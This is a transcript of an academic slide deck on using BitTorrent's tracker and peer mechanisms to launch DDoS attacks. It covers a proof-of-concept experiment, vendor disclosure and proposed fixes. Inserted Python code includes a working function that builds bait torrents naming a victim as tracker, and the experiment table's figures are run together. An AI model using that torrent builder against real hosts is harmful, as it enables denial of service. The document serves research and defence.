BotTorrent: Misusing BitTorrent to Launch DDoS Attacks Karim El Defrawy, Minas Gjoka, Athina Markopoulou UC Irvine.


2 Outline
o Introduction
o How BitTorrent works
o Using BitTorrent to launch DDoS attacks
o Experiment details and results
o Can we fix BitTorrent to prevent such attacks?
o Summary

3 Introduction
o In 2006, 60% of Internet traffic was due to peer-to-peer (P2P) protocols (Cache Logic)
o BitTorrent alone accounted for more than 35% by the end of 2006 (Cache Logic)
o The Mininova torrent search engine hit 2 billion downloads (Mininova, June 13th 2007)

4-5 Figure: P2P traffic is rising

6-7 Figure: BitTorrent is responsible for a significant amount of P2P traffic

8-9 P2P based DDoS attacks recently observed
o Alert announced on May 14th 2007 (Prolexic) observing an increase in P2P based DDoS attacks
o Attack based on the Direct Connect (DC) P2P system
o Attack involved over 300 000 IPs
o http://www.prolexic.com/news/20070514-alert.php
P2P DDoS is already happening!


11-14 How BitTorrent works
- A user publishes torrents
- The publisher sets up a tracker to coordinate the download
1- Users download the torrents
2- Users' clients contact the tracker to join the swarm and get a list of peers in the swarm
3- Clients download different parts of the file from different peers


16-17 Different attacks
Entity Faked        | BT Mode                  | Requirements
Report Fake Peer    | Centralized Tracker Mode | Send a spoofed message to the tracker announcing the victim as a peer
Report Fake Tracker | Centralized Tracker Mode | Publish torrents pointing to the victim as a tracker (multi-tracker)
Report Fake Peer    | DHT Mode                 | Send a fake BT PING message to the DHT network, spoofing the victim's source address

18-21 How an attack faking a tracker works
- The attacker publishes fake torrents with multiple tracker entries (or a single one) pointing to the victim
- The attacker sets up a tracker that reports a high number of seeders and leechers for these torrents
1- Users download the torrents whose fake trackers point to the victim
2- Clients contact the victim in the hope of starting the download
…


23 Experiment Setup
o Victim machine: Pentium 2, 512 MB RAM, Debian Linux, 100 Mbps Ethernet, running a light HTTP server
o Modified tracker reports a fake (high) number of seeders and leechers to the search engine
o Publish fake torrents on search engines
o Wait …

24 Proof of concept attack results
Exp. # | # Torrents | Ports Attacked: Open (Freq) | Ports Attacked: Closed + Throughput (Kbps) Avg(a) (run together in the transcript) | Throughput (Kbps) Max(a) | Total Unique # Hosts + TCP Conn. Avg/sec (run together in the transcript) | New Host Interarrival Time (sec)
I   | 10 | 1 (1)          | 662.77       | 127.22 | 5331753.93  | 7.89
II  | 25 | 1 (10)         | 10137.78     | 520.45 | 51271400.74 | 3.62
III | 25 | 1 (1)          | 501132.97    | 380.38 | 63201580.88 | 2.31
IV  | 25 | 1 (50) + 1 (1) | 49+201176.69 | 482.85 | 80461440.17 | 3.44
(a) Excluding the initial transient period (6 hours) of the experiment

25 Number of TCP connections per second

26 Attack throughput

27 Amount of traffic from clients

28 Distribution of sources in the IP address space

29 Mapping attack sources to ASs and BGP prefixes
o Attack sources in 2433 ASs on the Internet
o Attack sources in 12424 announced BGP prefixes
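The metrics of slide 24 (unique hosts, TCP connections per second, new-host interarrival time, ports hit) and the AS/prefix mapping of slide 29 are straightforward to compute from a connection log once source addresses are matched against announced prefixes with longest-prefix match. The following is an added example, not code from the slides or from the authors' measurement setup; the log lines, the prefix table and the AS numbers are constructed for illustration (documentation address ranges and private-use ASNs), not data from the experiment.

```python
# Added example, not from the BotTorrent slides: computes the per-experiment
# metrics of slide 24 (unique hosts, TCP connections/sec, new-host
# interarrival time, ports hit) and the AS/BGP-prefix mapping of slide 29
# from a connection log. The log lines and the prefix table are constructed
# for illustration; addresses are documentation ranges, ASNs private-use.
import ipaddress
from collections import Counter

# Constructed log: "epoch_seconds src_ip dst_port", one line per inbound TCP SYN.
LOG = """\
1000.0 198.51.100.7 80
1000.2 198.51.100.9 80
1000.5 198.51.100.7 22
1001.0 203.0.113.40 80
1001.1 203.0.113.40 443
1002.0 198.51.100.130 80
1003.0 192.0.2.77 80
1003.5 203.0.113.41 80
1004.0 198.51.100.7 80
"""

# Constructed prefix -> origin-AS table (stand-in for a BGP RIB dump).
PREFIXES = {
    "198.51.100.0/24": 64500,
    "198.51.100.128/25": 64501,   # more specific than the /24 above
    "203.0.113.0/24": 64502,
    "192.0.2.0/24": 64503,
}


def parse_log(text):
    """-> list of (timestamp, ip_address, dst_port)."""
    rows = []
    for line in text.splitlines():
        ts, ip, port = line.split()
        rows.append((float(ts), ipaddress.ip_address(ip), int(port)))
    return rows


def longest_prefix_match(ip, nets):
    """nets: list of (ip_network, asn). Returns the most specific match or None."""
    best = None
    for net, asn in nets:
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, asn)
    return best


def attack_metrics(rows, prefix_table):
    nets = [(ipaddress.ip_network(p), asn) for p, asn in prefix_table.items()]
    rows = sorted(rows)
    duration = rows[-1][0] - rows[0][0]
    first_seen = {}                      # ip -> time of its first connection
    for ts, ip, _ in rows:
        first_seen.setdefault(ip, ts)
    arrivals = sorted(first_seen.values())
    gaps = [b - a for a, b in zip(arrivals, arrivals[1:])]
    prefixes, ases = Counter(), Counter()
    for ip in first_seen:
        m = longest_prefix_match(ip, nets)
        if m is None:                    # not covered by any announced prefix
            prefixes["unannounced"] += 1
            continue
        prefixes[str(m[0])] += 1
        ases[m[1]] += 1
    return {
        "unique_hosts": len(first_seen),
        "conn_per_sec": len(rows) / duration if duration else float(len(rows)),
        "new_host_interarrival": sum(gaps) / len(gaps) if gaps else 0.0,
        "ports": Counter(port for _, _, port in rows),
        "prefixes": prefixes,
        "ases": ases,
    }


if __name__ == "__main__":
    for k, v in attack_metrics(parse_log(LOG), PREFIXES).items():
        print(k, v)
```

New-host interarrival is measured between first appearances, not between connections, which is why it stays meaningful even when a few hosts reconnect aggressively; the longest-prefix match matters because a source inside the /25 must be attributed to AS 64501, not to the covering /24.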

30 Attack ports

31 Related Work
o Attack using Overnet: must poison around 7000 files to be effective (Naoumov, 2006)
o Attack faking a client: must poison the swarms of 1119 torrents to generate several thousand TCP connections (Cheung Sia, 2006)
o An attack faking a tracker is more effective: the tracker is a central point in the architecture


33 Reporting the problem
We contacted:
o BitTorrent and Bram Cohen
o Search engines: Mininova, Pirate Bay, BitTorrent Monster
o Client developers: Azureus, Bitcomet
o Prolexic
Response from Azureus developers only

34 Solutions
o Handshake between clients and trackers, similar to the one between clients
o Clients exchange their view of trackers, similar to exchanging their view of peers
o Mechanism to identify and trace the seeders of the fake torrents (based on hashes)
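The fake-tracker attack of slides 16-21 and the first fix proposed on slide 34 are two sides of the same exchange: a multi-tracker torrent makes every downloader send HTTP announces to whatever host the announce-list names, and a client that never checks whether the answer actually came from a tracker keeps re-announcing for the life of the torrent. The block below is an added example, not code from the slides, the authors, or any BitTorrent client. It builds such a torrent, lists the URLs a client would try, and contrasts a naive re-announce loop with one that drops a URL after its first non-tracker reply. The victim address 192.0.2.10, the tracker URL, the replies and the drop-on-first-failure policy are constructed assumptions; a production client would back off rather than blacklist permanently.

```python
# Added example, not code from the BotTorrent slides or from any BitTorrent
# client. (a) A multi-tracker .torrent naming a victim as its tracker so every
# downloader announces to it (slides 16-21); (b) the client-side tracker
# validation that the "handshake between clients and trackers" fix (slide 34)
# implies. Hosts, URLs, replies and the drop policy are constructed assumptions.
import hashlib


def bencode(x):
    """Minimal bencode encoder (BEP 3): int, bytes/str, list, dict."""
    if isinstance(x, int):
        return b"i%de" % x
    if isinstance(x, str):
        x = x.encode()
    if isinstance(x, bytes):
        return b"%d:%s" % (len(x), x)
    if isinstance(x, list):
        return b"l" + b"".join(bencode(i) for i in x) + b"e"
    if isinstance(x, dict):
        items = sorted((k.encode() if isinstance(k, str) else k, v)
                       for k, v in x.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError("cannot bencode %r" % type(x))


def bdecode(data):
    """Minimal bencode decoder; raises ValueError on anything malformed."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":
            j = data.index(b"e", i)
            return int(data[i + 1:j]), j + 1
        if c in (b"l", b"d"):
            out = [] if c == b"l" else {}
            i += 1
            while data[i:i + 1] != b"e":
                if c == b"l":
                    v, i = parse(i)
                    out.append(v)
                else:
                    k, i = parse(i)
                    v, i = parse(i)
                    out[k] = v
            return out, i + 1
        if c.isdigit():
            j = data.index(b":", i)
            n = int(data[i:j])
            return data[j + 1:j + 1 + n], j + 1 + n
        raise ValueError("bad bencode at offset %d" % i)

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after bencoded value")
    return value


def make_attack_torrent(victim_host, victim_ports, real_tracker):
    """Torrent whose announce-list (BEP 12) names the victim on several ports.
    The content is irrelevant: clients announce before exchanging any piece."""
    info = {"name": "bait.iso", "length": 1, "piece length": 262144,
            "pieces": hashlib.sha1(b"constructed").digest()}
    fake = ["http://%s:%d/announce" % (victim_host, p) for p in victim_ports]
    return bencode({"announce": fake[0],
                    "announce-list": [[u] for u in fake] + [[real_tracker]],
                    "info": info})


def tracker_urls(torrent):
    """Every tracker URL a client would try, in order, de-duplicated."""
    t = bdecode(torrent)
    urls = [t[b"announce"].decode()]
    for tier in t.get(b"announce-list", []):
        urls.extend(u.decode() for u in tier)
    return list(dict.fromkeys(urls))


def is_tracker_reply(body):
    """A tracker answers with a bencoded dict carrying 'peers' or 'failure
    reason'; a web server, SSH daemon or closed port never does."""
    try:
        r = bdecode(body)
    except ValueError:
        return False
    return isinstance(r, dict) and (b"peers" in r or b"failure reason" in r)


def announce_rounds(urls, fetch, rounds=5, validate=True):
    """Simulate `rounds` re-announces; fetch(url) stands in for the HTTP GET.
    validate=False: naive client, keeps re-announcing to every URL forever.
    validate=True: drop a URL the first time its reply fails is_tracker_reply
    (assumed policy; a deployed fix would back off rather than blacklist)."""
    hits = {u: 0 for u in urls}
    live = list(urls)
    for _ in range(rounds):
        for u in list(live):
            hits[u] += 1
            if validate and not is_tracker_reply(fetch(u)):
                live.remove(u)
    return hits


def demo():
    torrent = make_attack_torrent("192.0.2.10", [80, 443, 22],
                                  "http://tracker.example/announce")
    urls = tracker_urls(torrent)

    def fetch(url):  # constructed replies: the victim is a web server, not a tracker
        if url.startswith("http://192.0.2.10:"):
            return b"<html><body>404 Not Found</body></html>"
        return bencode({"interval": 1800, "peers": b""})

    return (urls, announce_rounds(urls, fetch, validate=False),
            announce_rounds(urls, fetch, validate=True))


if __name__ == "__main__":
    for u, n, h in zip(*[demo()[0]] + [list(d.values()) for d in demo()[1:]]):
        print("%-36s naive=%d  hardened=%d" % (u, n, h))
```

The naive loop is the behaviour the experiment exploits: one bait torrent turns each of its downloaders into a source of periodic connections to every victim port in the announce-list. The validating loop still costs the victim one connection per downloader per port, so it limits the amplification rather than removing it; stopping the attack at its root is what the other two fixes on slide 34 (sharing tracker views, tracing fake-torrent seeders) are for.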


36 Summary
o Presented the misuse of BitTorrent to launch DDoS attacks
o Proof of concept attack implementation
o Analyzed the characteristics of the attack
o Proposed fixes to BitTorrent to detect and prevent such attacks
o Currently implementing the fixes

37 Questions ?

38 Thank you! keldefra@uci.edu mgjoka@uci.edu athina@uci.edu

39 Distribution of IPs on BGP Prefixes

40 Distribution of IPs on ASs

41 Unique hosts per second

